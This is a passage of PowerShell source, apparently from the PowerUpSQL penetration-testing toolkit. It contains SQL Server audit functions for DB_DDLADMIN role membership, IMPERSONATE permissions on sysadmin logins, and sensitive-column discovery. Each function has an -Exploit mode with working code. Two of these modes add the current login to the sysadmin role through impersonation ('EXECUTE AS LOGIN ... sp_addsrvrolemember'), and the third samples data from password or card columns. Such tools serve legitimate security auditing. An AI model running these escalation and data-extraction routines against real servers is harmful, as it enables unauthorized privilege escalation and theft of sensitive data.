Invoke-SQLAuditRoleDbDdlAdmin\n{\n    <#\n            .SYNOPSIS\n            Check if the current user has the db_ddladmin role in any databases.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditRoleDbDdlAdmin -Instance SQLServer1\\STANDARDDEV2014 -username myuser -password mypassword\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : DATABASE ROLE - DB_DDLADMIN\n            Description   : The login has the DB_DDLADMIN role in one or more databases.  This may allow the login to escalate privileges to sysadmin if the affected databases are trusted\n            and owned by a sysadmin, or if a custom assembly can be loaded.\n            Remediation   : If the permission is not required remove it.  Permissions are granted with a command like: EXEC sp_addrolemember 'DB_DDLADMIN', 'MyDbUser', and can be removed\n            with a command like:  EXEC sp_droprolemember 'DB_DDLADMIN', 'MyDbUser'\n            Severity      : Medium\n            IsVulnerable  : Yes\n            IsExploitable : No\n            Exploited     : No\n            ExploitCmd    : No exploit command is available at this time, but a custom assesmbly could be used.\n            Details       : myuser has the DB_DDLADMIN role in the testdb database.\n            Reference     : https://technet.microsoft.com/en-us/library/ms189612(v=sql.105).aspx\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Invoke-SQLAuditRoleDbDdlAdmin -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: DATABASE ROLE - DB_DDLAMDIN\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_DDLADMIN\"\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : CONNECTION SUCCESS\"\n        }\n\n        # Grab server, login, and role information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $ComputerName = $ServerInfo.ComputerName\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin  -SuppressVerbose\n        $CurrentPrincpalList = @()\n        $CurrentPrincpalList += $CurrentLogin\n        $CurrentPrincpalList += 'Public'\n        $CurrentLoginRoles | ForEach-Object -Process {\n            $CurrentPrincpalList += $_.RolePrincipalName\n        }\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'DATABASE ROLE - DB_DDLADMIN'\n        $Description   = 'The login has the DB_DDLADMIN role in one or more databases.  This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and owned by a sysadmin, or if a custom assembly can be loaded.'\n        $Remediation   = \"If the permission is not required remove it.  Permissions are granted with a command like: EXEC sp_addrolemember 'DB_DDLADMIN', 'MyDbUser', and can be removed with a command like:  EXEC sp_droprolemember 'DB_DDLADMIN', 'MyDbUser'\"\n        $Severity      = 'Medium'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = 'No exploit command is available at this time, but a custom assesmbly could be used.'\n        $Details       = ''\n        $Dependancies  = 'Affected databases must be owned by a sysadmin and be trusted. Or it must be possible to load a custom assembly configured for external access.'\n        $Reference     = 'https://technet.microsoft.com/en-us/library/ms189612(v=sql.105).aspx'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n\n        # Iterate through each current login and their associated roles\n        $CurrentPrincpalList|\n        ForEach-Object -Process {\n            # Check if login or role has the DB_DDLADMIN roles in any databases\n            $DBDDLADMIN = Get-SQLDatabaseRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -RolePrincipalName DB_DDLADMIN -PrincipalName $_ -SuppressVerbose\n\n            # -----------------------------------------------------------------\n            # Check for exploit dependancies\n            # Note: Typically secondary configs required for dba/os execution\n            # -----------------------------------------------------------------\n\n            # Check for db ownerships\n            if($DBDDLADMIN)\n            {\n                # Add an entry for each database where the user has the DB_DDLADMIN role\n                $DBDDLADMIN|\n                ForEach-Object -Process {\n                    $DatabaseTarget = $_.DatabaseName\n                    $PrincipalTarget = $_.PrincipalName\n\n                    Write-Verbose -Message \"$Instance : - $PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database.\"\n                    $IsVulnerable = 'Yes'\n\n                    # Check if associated database is trusted and the owner is a sysadmin\n                    $Depends = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseTarget -SuppressVerbose | Where-Object -FilterScript {\n                        $_.is_trustworthy_on -eq 1 -and $_.OwnerIsSysadmin -eq 1\n                    }\n\n                    if($Depends)\n                    {\n                        $IsExploitable = 'No'\n                        Write-Verbose -Message \"$Instance : - The $DatabaseTarget database is set as trustworthy and is owned by a sysadmin. This is exploitable.\"\n\n                        # -----------------------------------------------------------------\n                        # Exploit Vulnerability\n                        # Note: Add the current user to sysadmin fixed server role\n                        # -----------------------------------------------------------------\n                        if($Exploit)\n                        {\n                            # Check if user is already a sysadmin\n                            $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query \"SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status\" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status\n                            if($SysadminPreCheck -eq 0)\n                            {\n                                # Status user\n                                Write-Verbose -Message \"$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin.\"\n                                Write-Verbose -Message \"$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role by using DB_OWNER permissions...\"\n\n                                # Attempt to add the current login to sysadmins fixed server role\n                                $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query \"EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin';Revert\" -SuppressVerbose\n\n                                # Verify the login was added successfully\n                                $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query \"SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status\" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status\n                                if($SysadminPostCheck -eq 1)\n                                {\n                                    Write-Verbose -Message \"$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!\"\n                                    $Exploited = 'Yes'\n                                }\n                                else\n                                {\n\n                                }\n                            }\n                            else\n                            {\n                                Write-Verbose -Message \"$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin.\"\n                            }\n\n                            #Add record\n                            $Details = \"$PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database.\"\n                            $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n                        }\n                        else\n                        {\n                            #Add record\n                            $Details = \"$PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database.\"\n                            $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n                        }\n                    }\n                    else\n                    {\n                        #Add record\n                        Write-Verbose -Message \"$Instance : - The $DatabaseTarget is not exploitable.\"\n                        $Details = \"$PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database, but this was not exploitable.\"\n                        $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n                    }\n                }\n            }\n        }\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_DDLADMIN\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# -----------------------------------\n# Invoke-SQLAuditPrivImpersonateLogin\n# -----------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAuditPrivImpersonateLogin\n{\n    <#\n            .SYNOPSIS\n            Check if the current login has the IMPERSONATE permission on any sysadmin logins. Attempt to use permission to obtain sysadmin privileges.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER NoOutput\n            Don't output anything.\n            .PARAMETER Exploit\n            Exploit vulnerable issues\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\\STANDARDDEV2014 -Username evil -Password Password123!\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : PERMISSION - IMPERSONATE LOGIN\n            Description   : The current SQL Server login can impersonate other logins.  This may allow an authenticated login to gain additional privileges.\n            Remediation   : Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON\n            Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]\n            Severity      : High\n            IsVulnerable  : Yes\n            IsExploitable : Yes\n            Exploited     : No\n            ExploitCmd    : Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\\STANDARDDEV2014 -Exploit\n            Details       : public can impersonate the sa SYSADMIN login. This test was ran with the evil login.\n            Reference     : https://msdn.microsoft.com/en-us/library/ms181362.aspx\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\\STANDARDDEV2014 -Username evil -Password Password123! -Exploit\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : PERMISSION - IMPERSONATE LOGIN\n            Description   : The current SQL Server login can impersonate other logins.  This may allow an authenticated login to gain additional privileges.\n            Remediation   : Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON\n            Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]\n            Severity      : High\n            IsVulnerable  : Yes\n            IsExploitable : Yes\n            Exploited     : Yes\n            ExploitCmd    : Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\\STANDARDDEV2014 -Exploit\n            Details       : public can impersonate the sa SYSADMIN login. This test was ran with the evil login.\n            Reference     : https://msdn.microsoft.com/en-us/library/ms181362.aspx\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Status user\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: PERMISSION - IMPERSONATE LOGIN\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED.\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - IMPERSONATE LOGIN\"\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : CONNECTION SUCCESS.\"\n        }\n\n        # Grab server information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $CurrentLogin = $ServerInfo.CurrentLogin\n\n        # ---------------------------------------------------------------\n        # Set function meta data for report output\n        # ---------------------------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'Excessive Privilege - Impersonate Login'\n        $Description   = 'The current SQL Server login can impersonate other logins.  This may allow an authenticated login to gain additional privileges.'\n        $Remediation   = 'Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]'\n        $Severity      = 'High'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = \"Invoke-SQLAuditPrivImpersonateLogin -Instance $Instance -Exploit\"\n        $Details       = ''\n        $Reference     = 'https://msdn.microsoft.com/en-us/library/ms181362.aspx'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # ---------------------------------------------------------------\n        # Check for Vulnerability\n        # ---------------------------------------------------------------\n\n        # Get list of SQL Server logins that can be impersonated by the current login\n        $ImpersonationList = Get-SQLServerPriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.PermissionName -like 'IMPERSONATE'\n        }\n\n        # Check if any SQL Server logins can be impersonated\n        if($ImpersonationList)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : - Logins can be impersonated.\"\n            $IsVulnerable = 'Yes'\n\n            # ---------------------------------------------------------------\n            # Check if Vulnerability is Exploitable\n            # ---------------------------------------------------------------\n\n            # Iterate through each affected login and check if they are a sysadmin\n            $ImpersonationList |\n            ForEach-Object -Process {\n                # Grab grantee and impersonable login\n                $ImpersonatedLogin = $_.ObjectName\n                $GranteeName = $_.GranteeName\n\n                # Check if impersonable login is a sysadmin\n                $ImpLoginSysadminStatus = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query \"SELECT IS_SRVROLEMEMBER('sysadmin','$ImpersonatedLogin') as Status\" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status\n                If($ImpLoginSysadminStatus -eq 1)\n                {\n                    #Status user\n                    Write-Verbose -Message \"$Instance : - $GranteeName can impersonate the $ImpersonatedLogin sysadmin login.\"\n                    $IsExploitable = 'Yes'\n                    $Details = \"$GranteeName can impersonate the $ImpersonatedLogin SYSADMIN login. This test was ran with the $CurrentLogin login.\"\n\n                    # ---------------------------------------------------------------\n                    # Exploit Vulnerability\n                    # ---------------------------------------------------------------\n                    if($Exploit)\n                    {\n                        # Status user\n                        Write-Verbose -Message \"$Instance : - EXPLOITING: Starting exploit process...\"\n\n                        # Check if user is already a sysadmin\n                        $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query \"SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status\" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status\n                        if($SysadminPreCheck -eq 0)\n                        {\n                            # Status user\n                            Write-Verbose -Message \"$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin.\"\n                            Write-Verbose -Message \"$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role by impersonating $ImpersonatedLogin...\"\n\n                            # Attempt to add the current login to sysadmins fixed server role\n                            $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query \"EXECUTE AS LOGIN = '$ImpersonatedLogin';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin';Revert\" -SuppressVerbose\n\n                            # Verify the login was added successfully\n                            $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query \"SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status\" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status\n                            if($SysadminPostCheck -eq 1)\n                            {\n                                Write-Verbose -Message \"$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!\"\n                                $Exploited = 'Yes'\n                            }\n                            else\n                            {\n                                Write-Verbose -Message \"$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin.\"\n                            }\n                        }\n                        else\n                        {\n                            # Status user\n                            Write-Verbose -Message \"$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed.\"\n                            $Exploited = 'No'\n                        }\n                    }\n                }\n                else\n                {\n                    # Status user\n                    Write-Verbose -Message \"$Instance : - $GranteeName can impersonate the $ImpersonatedLogin login (not a sysadmin).\"\n                    $Details = \"$GranteeName can impersonate the $ImpersonatedLogin login (not a sysadmin). This test was ran with the $CurrentLogin login.\"\n                    $IsExploitable = 'No'\n                }\n\n                # Add record\n                $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n            }\n        }\n        else\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : - No logins could be impersonated.\"\n        }\n\n        # Status user\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - IMPERSONATE LOGIN\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditSampleDataByColumn\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAuditSampleDataByColumn\n{\n    <#\n            .SYNOPSIS\n            Check if the current login can access any database columns that contain the word password. Supports column name keyword search and custom data sample size.\n            Note: For cleaner data sample output use the Get-SQLColumnSampleData function.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER NoOutput\n            Don't output anything.\n            .PARAMETER Exploit\n            Exploit vulnerable issues\n            .PARAMETER SampleSize\n            Number of records to sample.\n            .PARAMETER Keyword\n            Column name to search for.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditSampleDataByColumn -Instance SQLServer1\\STANDARDDEV2014 -Keyword card -SampleSize 2 -Exploit\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : Potentially Sensitive Columns Found\n            Description   : Columns were found in non default databases that may contain sensitive information.\n            Remediation   : Ensure that all passwords and senstive data are masked, hashed, or encrypted.\n            Severity      : Informational\n            IsVulnerable  : Yes\n            IsExploitable : Yes\n            Exploited     : Yes\n            ExploitCmd    : Invoke-SQLAuditSampleDataByColumn -Instance SQLServer1\\STANDARDDEV2014 -Exploit\n            Details       : Data sample from [testdb].[dbo].[tracking].[card] : \"4111111111111111\" \"4111111111111112\".\n            Reference     : https://msdn.microsoft.com/en-us/library/ms188348.aspx\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of records to sample.')]\n        [int]$SampleSize = 1,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = ' Column name to search for.')]\n        [string]$Keyword = 'Password'\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: SEARCH DATA BY COLUMN\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: SEARCH DATA BY COLUMN\"\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : CONNECTION SUCCESS\"\n        }\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'Potentially Sensitive Columns Found'\n        $Description   = 'Columns were found in non default databases that may contain sensitive information.'\n        $Remediation   = 'Ensure that all passwords and senstive data are masked, hashed, or encrypted.'\n        $Severity      = 'Informational'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = \"Invoke-SQLAuditSampleDataByColumn -Instance $Instance -Exploit\"\n        $Details       = ''\n        $Reference     = 'https://msdn.microsoft.com/en-us/library/ms188348.aspx'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n        Write-Verbose -Message \"$Instance : - Searching for column names that match criteria...\"\n        $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -ColumnNameSearch $Keyword -NoDefaults -SuppressVerbose\n        if($Columns)\n        {\n            $IsVulnerable  = 'Yes'\n        }\n        else\n        {\n            $IsVulnerable  = 'No'\n        }\n\n        # -----------------------------------------------------------------\n        # Check for exploit dependancies\n        # Note: Typically secondary configs required for dba/os execution\n        # -----------------------------------------------------------------\n        if($IsVulnerable -eq 'Yes')\n        {\n            # List affected columns\n            $Columns|\n            ForEach-Object -Process {\n                $DatabaseName = $_.DatabaseName\n                $SchemaName = $_.SchemaName\n                $TableName = $_.TableName\n                $ColumnName = $_.ColumnName\n                $AffectedColumn = \"[$DatabaseName].[$SchemaName].[$TableName].[$ColumnName]\"\n                $AffectedTable = \"[$DatabaseName].[$SchemaName].[$TableName]\"\n                $Query = \"USE $DatabaseName; SELECT TOP $SampleSize [$ColumnName] FROM $AffectedTable \"\n\n                Write-Verbose -Message \"$Instance : - Column match: $AffectedColumn\"\n\n                # ------------------------------------------------------------------\n                # Exploit Vulnerability\n                # Note: Add the current user to sysadmin fixed server role, get data\n                # ------------------------------------------------------------------\n                if($IsVulnerable -eq 'Yes')\n                {\n                    $TblTargetColumns |\n                    ForEach-Object -Process {\n                        # Add sample data\n                        Write-Verbose -Message \"$Instance : - EXPLOITING: Selecting data sample from column $AffectedColumn.\"\n\n                        # Query for data\n                        $DataSample = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $Query -SuppressVerbose |\n                        ConvertTo-Csv -NoTypeInformation |\n                        Select-Object -Skip 1\n                        if($DataSample)\n                        {\n                            $Details = \"Data sample from $AffectedColumn : $DataSample.\"\n                        }\n                        else\n                        {\n                            $Details = \"No data found in affected column: $AffectedColumn.\"\n                        }\n                        $IsExploitable = 'Yes'\n                        $Exploited = 'Yes'\n\n                        # Add record\n                        $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n                    }\n                }\n                else\n                {\n                    # Add affected column list\n                    $Details = \"Affected column: $AffectedColumn.\"\n                    $IsExploitable = 'Yes'\n                    $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n                }\n            }\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : - No columns were found that matched the search.\"\n        }\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: SEARCH DATA BY COLUMN\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# 